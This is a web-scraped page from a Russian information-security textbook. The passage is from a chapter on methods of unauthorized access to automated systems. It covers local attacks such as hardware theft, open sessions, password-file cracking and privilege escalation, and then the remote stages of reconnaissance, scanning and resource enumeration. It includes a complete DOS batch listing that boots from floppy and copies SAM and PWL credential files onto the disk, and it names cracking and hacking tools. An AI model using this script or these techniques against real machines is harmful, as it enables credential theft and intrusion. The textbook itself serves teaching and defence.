Главная страница
Навигация по странице:

  • Локальный доступ

  • Локальный доступ 233

  • Листинг 13.1.

  • Окончание листинга 13.1

  • Удаленный доступ

  • Удаленный доступ 237

  • Идентификация доступных ресурсов

  • Методы и средства защиты информации. Внимание!!! В книге могут встречаться существенные ошибки (в рисунках и формулах). Они не связаны ни со


    Скачать 4.86 Mb.
    НазваниеВнимание!!! В книге могут встречаться существенные ошибки (в рисунках и формулах). Они не связаны ни со
    АнкорМетоды и средства защиты информации.pdf
    Дата17.08.2018
    Размер4.86 Mb.
    Формат файлаpdf
    Имя файлаМетоды и средства защиты информации.pdf
    ТипДокументы
    #23118
    страница31 из 63
    1   ...   27   28   29   30   31   32   33   34   ...   63
    Глава
    13.
    Методы
    и
    средства
    несанкционированного
    получения
    ...
    По
    направленности
    действий
    злоумышленника методы и
    средства не
    - санкционированного получения информации из
    АС
    подразделяются на методы и
    средства
    , направленные на
    получение
    системной
    информации
    (
    файлы паро
    - лей
    , ключей шифрования
    , перечни учетных записей
    , схемы распределения се
    - тевых адресов и
    т п
    .) и
    собственно
    прикладной
    информации
    Многих злоумыш
    - ленников
    , проникающих в
    АС
    , подключенные к
    глобальным сетям
    , вообще не интересует хранящаяся в
    этих
    АС
    прикладная информация или интересует лишь в
    той степени
    , в
    какой она позволяет получить доступ к
    системной информации
    Обычно такие злоумышленники используют подобные
    АС
    либо в
    качестве про
    - межуточных узлов для проникновения в
    другие
    АС
    , либо для несанкционирован
    - ного хранения собственной информации
    По
    тяжести
    последствий
    используемые злоумышленниками методы и
    средства несанкционированного получения информации можно разделить на
    неопасные
    (
    сканирование портов
    , попытки установления соединений и
    т п
    .),
    по
    -
    тенциально
    опасные
    (
    получение доступа к
    содержимому подсистем хранения данных
    , попытки подбора паролей и
    т п
    .),
    опасные
    (
    получение доступа с
    высо
    - ким уровнем полномочий
    , модификация информации в
    АС
    , копирование систем
    - ной и
    прикладной информации
    , создание собственной информации и
    т п
    .) и
    чрезвычайно
    опасные
    (
    уничтожение информации
    , блокирование доступа ле
    - гальных пользователей к
    АС
    и т
    п
    .).
    Локальный
    доступ
    Как уже отмечалось
    , при наличии у
    злоумышленника локального доступа к
    АС
    и благоприятной для него обстановки он сможет обойти практически любую за
    - щиту
    Для того чтобы значительно снизить шансы злоумышленника
    , имеющего локальный доступ к
    интересующей его
    АС
    , необходимо предпринять целый ком
    - плекс мер
    , как технического
    , так и
    организационного характера
    , начиная от про
    - ектирования архитектуры
    АС
    с учетом всех требований защиты и
    заканчивая ус
    - тановкой камер наблюдения
    , охранной сигнализации и
    организации специально
    - го режима доступа
    Однако на практике в
    большинстве случаев
    , по крайней мере какой
    - либо один фактор остается вне поля зрения организаций
    , обрабатываю
    - щих в
    своих
    АС
    информацию с
    ограниченным доступом
    , которая может интере
    - совать тех или иных злоумышленников
    Нередко оказывается и
    так
    , что таких факторов значительно больше
    , поэтому если организация не приняла всех мер для того
    , чтобы предотвратить несанкционированный локальный доступ к
    своим
    АС
    и их компонентам
    , можно сказать с
    уверенностью
    , что ее секреты рано или поздно попадут к
    заинтересованным лицам
    Рассмотрим подробнее методы и
    средства несанкционированного доступа к
    информации
    , которые можно применить на локальном уровне
    Прежде всего
    , злоумышленник может воспользоваться одним из самых древ
    - них способов
    , против которого не сможет противостоять никакая
    АС
    , —
    хище
    -

    Локальный
    доступ
    231
    нием
    Хищение информации
    , ее носителей
    , отдельных компонентов
    АС
    и
    , учи
    - тывая современные тенденции к
    миниатюризации
    СВТ
    , целых
    АС
    было и
    оста
    - ется одним из самых распространенных способов несанкционированного полу
    - чения информации
    При этом квалификация лиц
    , участвующих в
    хищении может быть самой низкой
    , а
    правоохранительные органы
    , расследующие такие факты
    , да и
    зачастую сами подвергшиеся хищению организации
    , как правило
    , сосредо
    - тачивают основное внимание на осязаемых материальных ценностях
    К
    хище
    - нию можно отнести и
    такие действия злоумышленников
    , когда компоненты
    АС
    просто подменяются на аналогичные
    Например
    , сначала специалист высокой квалификации оказавшись под каким
    - то предлогом в
    офисе организации и
    ис
    - пользуя благоприятную ситуацию
    , может за считанные секунды выяснить мо
    - дель жесткого диска
    , причем все его действия будет контролировать легальный пользователь
    (
    типичная ситуация
    — любезное предложение помощи неопытно
    - му сотруднику
    , у
    которого

    завис
    ” компьютер и
    т п
    .).
    Затем злоумышленникам ос
    - тается лишь найти вышедший из строя жесткий диск аналогичной модели и
    , тай
    - но проникнув в
    офис
    , заменить интересующий их жесткий диск неисправным
    Если в
    организации не ведется строгого учета компонентов
    АС
    по серийным но
    - мерам
    (
    что
    , к
    сожалению
    , встречается сплошь и
    рядом
    ), а
    злоумышленникам удастся скрыть факт проникновения в
    помещение
    (
    что также не очень большая проблема для опытных взломщиков
    ), то такое происшествие не вызовет никако
    - го подозрения
    Кроме того
    , к
    хищениям во многих случаях можно отнести прямое копирова
    - ние всего жесткого диска на другой диск
    Даже если исходный диск защищен
    , например
    , с
    помощью шифрования
    , злоумышленник средней квалификации мо
    - жет принести с
    собой другой жесткий диск большего объема и
    просто скопиро
    - вать все содержимое исходного диска на свой диск
    , который впоследствии будет передан на исследование специалистам более высокой квалификации
    В
    таком случае получение несанкционированного доступа к
    скопированной информации
    — всего лишь вопрос времени
    Наконец
    , следует знать
    , что часто хищение информации маскируется под хищение материальных ценностей
    Например
    , злоумышленники могут похитить все офисное оборудование
    , хотя на самом деле их интересует лишь содержи
    - мое жесткого диска компьютера
    , стоявшего в
    кабинете руководителя
    Часто ока
    - зывается
    , что руководители организаций
    , требуя от подчиненных соблюдения всех правил информационной безопасности
    , не распространяют на себя эти требования
    , хотя имеют доступ к
    любым файлам своих подчиненных
    Например
    , большинство руководителей даже не подозревают
    , что все открываемые ими по сети файлы таких программ
    , как
    Microsoft Word и
    других офисных приложений
    , копируются в
    папку для временных файлов
    Windows на локальном диске
    Вторым распространенным методом несанкционированного получения ин
    - формации при локальном доступе к
    АС
    является использование
    открытого
    сеанса
    легального
    пользователя
    Здесь возможности злоумышленника оп
    -

    232
    Глава
    13.
    Методы
    и
    средства
    несанкционированного
    получения
    ...
    ределяются лишь временем
    , на который он получает доступ к
    АС
    , полномочия
    - ми в
    АС
    легального пользователя и
    наличием
    (
    точнее
    , отсутствием
    ) контроля со стороны легального пользователя или его коллег
    Особая опасность этого мето
    - да заключается в
    том
    , что со стороны специалистов по защите информации дей
    - ствия злоумышленника
    , воспользовавшегося открытым сеансом легального пользователя
    , скорее всего
    , не вызовут никаких подозрений
    (
    в большинстве слу
    - чаев на

    своих
    ” пользователей
    , особенно если они занимают в
    иерархии органи
    - зации более высокое положение
    , администраторы безопасности обращают меньше всего внимания
    ).
    Часто пользователи практически подталкивают посто
    - ронних к
    несанкционированному доступу к
    своим системам
    , размещая свои па
    - роли

    под рукой
    ” прямо на рабочем месте
    (
    например
    , наклеивая листки для за
    - писей с
    паролями на монитор или на тыльную сторону клавиатуры
    ).
    В
    этом слу
    - чае такая

    защищенная
    ” система ничем не отличается от системы
    , на которой остался открытым сеанс легального пользователя
    Близким к
    указанному выше методу является
    подбор
    пароля
    легального
    пользователя
    Этот метод более

    заметен
    ” со стороны компонентов
    АС
    , обес
    - печивающих безопасность
    , однако также оказывается достаточно эффективным
    Например
    , в
    организации может быть реализована жесткая политика по выбору паролей
    , обеспечивающая невозможность случайного подбора или угадывания паролей за
    2–3 попытки с
    блокированием учетной записи при превышении коли
    - чества попыток
    При этом все пользователи организации
    , покидая рабочее ме
    - сто
    , должны временно блокировать доступ к
    своим системам так
    , чтобы блоки
    - ровка снималась только при правильно введенном пароле
    Однако некоторые пользователи могут установить полюбившиеся программы
    - заставки
    , в
    которых ввод пароля происходит в
    обход основной операционной системы
    Часто оказы
    - вается
    , что такие пользователя в
    качестве пароля выбирают последовательно
    - сти вида
    1111
    или user и
    т п
    ., что значительно облегчает задачу подбора паро
    - ля легального пользователя
    Часто для осуществления подбора пароля легального пользователя зло
    - умышленники прибегают к
    использованию открытого сеанса этого же или друго
    - го пользователя с
    последующим копированием системных файлов
    В
    частности
    , в
    системах
    Windows 98/ME злоумышленник может скопировать файлы с
    расши
    - рением
    PWL
    , находящиеся в
    основной папке
    Windows, а
    затем применить к
    ним какое
    - нибудь средство вскрытия файлов
    PWL
    , например
    Repwl или
    CAIN.
    В
    сис
    - темах
    Windows NT/2000/XP с
    той же целью злоумышленник может скопировать файл
    SAM
    или его резервную копию
    SAM._
    , находящиеся в
    папке repair сис
    - темной папки
    Windows, а
    затем попытаться установить хранящиеся в
    них пароли с
    помощью системы
    L0phtCrack.
    В
    Unix- подобных системах наибольший интерес для злоумышленника представляют файлы
    /etc/passwd или shadow
    С
    помо
    - щью таких утилит
    , как crack или john
    , любой злоумышленник
    , обладая мини
    - мальной квалификацией
    , может за считанные минуты или даже секунды полу
    -

    Локальный
    доступ
    233
    чить информацию о
    паролях легальных пользователей
    , хранящихся в
    этих фай
    - лах
    Еще одним методом локального несанкционированного доступа является
    ис
    -
    пользование
    учетной
    записи
    легального
    пользователя
    для
    расширения
    полномочий
    в
    АС
    Он отличается от метода использования открытого сеанса легального пользователя тем
    , что в
    данном случае злоумышленнику не требует
    - ся выдавать себя за другого
    , поскольку он в
    силу тех или иных причин сам имеет доступ к
    АС
    Например
    , во многих организациях сторонним пользователям
    , по
    - сетителям
    , представителям других организаций
    , временным сотрудникам и
    дру
    - гим лицам
    , не являющимся сотрудниками организации
    , предоставляют так на
    - зываемые гостевые учетные записи
    Однако часто оказывается
    , что
    АС
    , предна
    - значенные для гостевого доступа
    , имеют физический доступ ко всем
    АС
    организации
    , а
    действия сторонних пользователей
    , получающих гостевой дос
    - туп
    , практически никак не контролируются
    Это позволяет злоумышленнику
    , вос
    - пользовавшись специальными
    программами
    взлома
    (exploit), расширить свои полномочия вплоть до получения полного доступа ко всем
    АС
    организации
    В
    системах
    Windows NT/2000/XP, например
    , злоумышленник может воспользо
    - ваться такими программами взлома
    , как getadmin или main
    , а
    в
    Unix- подобных системах
    — многочисленными программами взлома командной оболочки и
    дру
    - гих
    Unix- программ
    , в
    изобилии присутствующих в
    Internet, действие которых ос
    - новано на известных изъянах соответствующего системного программного обес
    - печения
    Unix.
    Наконец
    , часто злоумышленнику
    , имеющему локальный доступ к
    АС
    , не нуж
    - но вообще обладать квалификацией даже среднего уровня
    , чтобы получить не
    - санкционированный доступ к
    информации этой
    АС
    Во многих случаях ему дос
    - таточно прибегнуть к
    такому простому приему
    , как
    загрузка
    альтернативной
    операционной
    системы
    Такая система может загружаться как с
    дискеты
    , так и
    с компакт
    - диска
    . (
    К
    особой разновидности этого метода является срабатывание функции автозапуска в
    Windows 98.
    Воспользовавшись этим изъяном
    , злоумыш
    - ленник может запустить нужную ему программу даже на системе c Windows 98, защищенной с
    помощью экранной заставки с
    паролем
    ).
    Например
    , с
    помощью простого командного файла
    , приведенного в
    листинге
    13.1, злоумышленник мо
    - жет в
    считанные минуты перезагрузить компьютер
    , работающий под управлени
    - ем
    Windows 98/ME/2000/XP и
    получить в
    свое распоряжение перечень всех фай
    - лов
    , а
    также файлы
    PWL
    и
    SAM
    , хранящиеся на дисках этого компьютера
    Листинг
    13.1.
    Пример командного файла для загрузки альтернативной операционной системы
    @ECHO OFF mode con codepage prepare=((866) ega3.cpi) mode con codepage select=866 keyb ru,,keybrd3.sys

    234
    Глава
    13.
    Методы
    и
    средства
    несанкционированного
    получения
    ...
    set EXPAND=YES
    SET DIRCMD=/O:N set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T set LglDrv=%LglDrv% 19 S 18 R 17 Q 16 P 15 O 14 N set LglDrv=%LglDrv% 13 M 12 L 11 K 10 J 9 I 8 H 7 G set LglDrv=%LglDrv% 6 F 5 E 4 D 3 C call setramd.bat %LglDrv% set temp=c:\ set tmp=c:\ path=%RAMD%:\;a:\;a:\vc copy command.com %RAMD%:\ >nul set comspec=%RAMD%:\command.com >nul md %RAMD%:\vc >nul
    %RAMD%: copy a:\vc\*.* %RAMD%:\vc >nul copy a:\arj.exe %RAMD%:\ >nul copy a:\files.arj %RAMD%:\ >nul copy a:\files.a01 %RAMD%:\ >nul arj.exe e files.arj >nul arj.exe e files.a01 -y >nul
    A:\smartdrv.exe >nul del files.a* >nul md %RAMD%:\sec >nul cd sec >nul md disks >nul cd disks >nul ldir c: /s > c.txt ldir d: /s > d.txt
    Окончание
    листинга
    13.1 cd \ ntfspro.exe >nul cd sec\disks dir c: /s >> c.txt dir d: /s >> d.txt cd.. md c md d

    Удаленный
    доступ
    235
    copy /b c:\winnt\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\winnt\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\windows\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\*.pwl %RAMD%:\sec\c >nul copy /b d:\windows\*.pwl %RAMD%:\sec\d >nul cd \ arj.exe a -r -v1200 dirs.arj %RAMD%:\sec -y >nul copy %RAMD%:\dirs.arj a:\ copy %RAMD%:\dirs.a01 a:\
    Удаленный
    доступ
    В
    отличие от локального доступа
    , палитра методов и
    средств несанкциониро
    - ванного получения информации из
    АС
    при удаленном доступе значительно ши
    - ре и
    достаточно сильно зависит от используемой операционной системы
    (
    ОС
    ), настройки параметров безопасности и
    т п
    Как ни парадоксально
    , но наиболее защищенными
    (
    с некоторыми оговорками
    ) при удаленном доступе являются
    АС
    , работающие под управлением операционных систем
    , которые наибольше всего уязвимы при локальном доступе
    , например
    Windows 98.
    Однако это противоре
    - чие только кажущееся
    Действительно
    , системы типа
    MS DOS или
    Windows 98 изначально не проектировались для работы в
    сетях
    Поэтому в
    них практически отсутствуют развитые средства удаленного доступа
    , а
    имеющиеся средства представляют собой внешние по отношению к
    ядру таких систем модули
    , слабо интегрированные с
    остальными компонентами подобных простейших
    ОС
    По
    - этому
    , если пользователь
    АС
    , работающей под управлением такой
    ОС
    , как
    Windows 98, соблюдает простейшие правила безопасности
    (
    например
    , не пре
    - доставляет доступ по сети к
    файлам и
    папкам своего компьютера
    ), его система обладает высокой степенью устойчивости ко взлому
    С
    другой стороны
    , большинство
    Unix- подобных операционных систем изна
    - чально проектировались и
    развивались именно как сетевые операционные сис
    - темы
    Поэтому такие системы часто для обеспечения безопасной работы в
    сетях требуют тщательной настройки параметров безопасности
    Следует заметить
    , что за редким исключением
    (
    например
    , таким
    , как
    ОС
    OpenBSD), большинство современных
    ОС
    при настройке параметров
    , принятых по умолчанию
    , являются
    небезопасными
    с точки зрения работы в
    компьютер
    - ных сетях
    Поскольку полное описание методов и
    средств несанкционированного полу
    - чения информации из
    АС
    при удаленном доступе может занять объем
    , значи
    - тельно превышающий объем данной книги
    , мы лишь вкратце рассмотрим основ
    - ные из них
    , используя для этого схему удаленного проникновения в
    АС
    , которой пользуется большинство злоумышленников
    (
    рис
    . 13.2).

    236
    Глава
    13.
    Методы
    и
    средства
    несанкционированного
    получения
    ...
    Рис
    . 13.2.
    Типовая схема несанкционированного получения информации из
    АС
    при удаленном доступе
    Сбор
    информации
    На этапе сбора информации злоумышленник определяет пул
    IP- адресов
    АС
    организации
    , доступных из сети общего пользования
    Строго говоря
    , этапы сбо
    - ра информации
    , сканирования
    , идентификации доступных ресурсов и
    , в
    какой
    - то мере
    , получения доступа могут предприниматься не злоумышленниками
    , а
    обычными пользователями
    (
    хотя
    , конечно
    , трудно назвать

    обычным
    ” пользова
    - теля
    , который сканирует все открытые порты
    АС
    , чтобы всего
    - навсего отправить сообщение электронной почты
    ).
    Только совокупность этих операций с
    соблюде
    - нием некоторых условий
    (
    например
    , массированное неоднократное сканирование всего пула
    IP- адресов организации с
    попытками установления соединений на все открытые порты
    ) может говорить о
    предпринимающихся попытках несанкциониро
    - ванного получения информации
    Каждая же из указанных операций сама по себе не является чем
    - то из ряда вон выходящим
    Именно поэтому в
    комплект поставки многих современных се
    - тевых
    ОС
    входят инструментальные средства
    , призванные обеспечить выпол
    - нение соответствующих задач
    , в
    частности
    , сбора информации
    К
    таким средствам относятся стандартные утилиты
    Unix whois
    , traceroute
    (
    в
    Windows — tracert
    ), nslookup
    , host
    , и
    их аналоги
    , портированные в
    другие
    ОС
    , а
    также другие подобные средства
    , обладающие более дружественным ин
    - терфейсом
    (Web- ориентированные варианты whois
    , VisualRoute, Sam Spade и
    т п
    .).
    С
    помощью таких вполне безобидных средств можно выяснить
    :

    тип сетевого подключения организации
    (
    единичный компьютер
    , сеть класса
    C, сеть класса
    B);

    имена и
    адреса серверов доменных имен
    (DNS — Domain Name System), обеспечивающих трансляцию символьных имен в
    IP- адреса по запросам
    АС
    организации
    ;

    Удаленный
    доступ
    237

    сеть
    , в
    которой установлены подключенные к
    Internet
    АС
    организации
    (
    сеть провайдера
    , прямое подключение и
    т п
    .);

    схему подключения маршрутизаторов и
    брандмауэров
    ;

    реальные имена
    , телефоны и
    адреса электронной почты администратора подключения
    ;

    схему распределения
    IP- адресов внутри сети организации и
    имена отдель
    - ных узлов
    (
    с помощью так называемого переноса зоны с
    помощью утилиты nslookup
    ).
    Если сеть организации достаточно обширна и
    в ней имеется множество ком
    - пьютеров
    , подключенных к
    Internet, тщательно проведенный сбор информации может дать много других интересных для злоумышленника сведений
    Чем тща
    - тельнее проведен предварительный сбор информации
    , тем выше вероятность успешного проникновения в
    АС
    интересующей злоумышленника организации
    Сканирование
    Составив предварительную схему сети и
    наметив предварительный перечень наиболее уязвимых ее узлов
    , злоумышленник
    , как правило
    , переходит к
    скани
    - рованию
    Сканирование позволяет выявить реально работающие
    АС
    исследуе
    - мой организации
    , доступные по
    Internet, определить тип и
    версию
    ОС
    , под управлением которых они работают
    , а
    также получить перечни портов
    TCP и
    UDP, открытых на выявленных
    АС
    Для проведения сканирования в
    распоряжении злоумышленника имеется широ
    - кий спектр инструментальных средств
    , начиная от простейшей утилиты ping
    , вхо
    - дящей в
    комплект поставки всех современных
    ОС
    , и
    заканчивая специализирован
    - ными хакерскими инструментами
    , такими
    , как fping
    , Pinger, icmpenum
    , nmap
    , strobe
    , netcat
    , NetScantTools Pro 2000, SuperScan, NTOScanner, WinScan, ipeye
    ,
    Windows UDP Port Scanner, Cheops и
    множеством других
    Вооружившись этими или подобными инструментами
    , злоумышленник может уточнить составленную на предыдущем этапе схему сети и
    выбрать
    АС
    , на кото
    - рые следует обратить внимание в
    первую
    , вторую и
    т д
    очереди
    Идентификация
    доступных
    ресурсов
    Очертив круг
    АС
    организации
    , которые представляют собой для злоумыш
    - ленника наибольший интерес
    , он переходит к
    следующему этапу
    — идентифи
    - кации доступных ресурсов
    В
    большинстве современных сетевых
    ОС
    для реше
    - ния подобных задач имеется целый ряд инструментальных средств
    , таких
    , на
    - пример
    , как команды net
    , nbtstat и
    nbtscan в
    Windows NT/2000/XP и
    telnet
    , finger
    , rwho
    , rusers
    , rpcinfo и
    rpcdump в
    Unix.
    Кроме того
    , злоумышленнику могут пригодиться такие утилиты
    , как nltest
    , rmtshare
    , srvcheck
    , srvinfo и
    snmputil
    (Windows NT/2000/XP Resource Toolkit), а
    также хакерские утилиты
    DumpSec, Legion, NAT, enum
    , user2sid
    , sid2user и
    netcat

    238
    1   ...   27   28   29   30   31   32   33   34   ...   63


    написать администратору сайта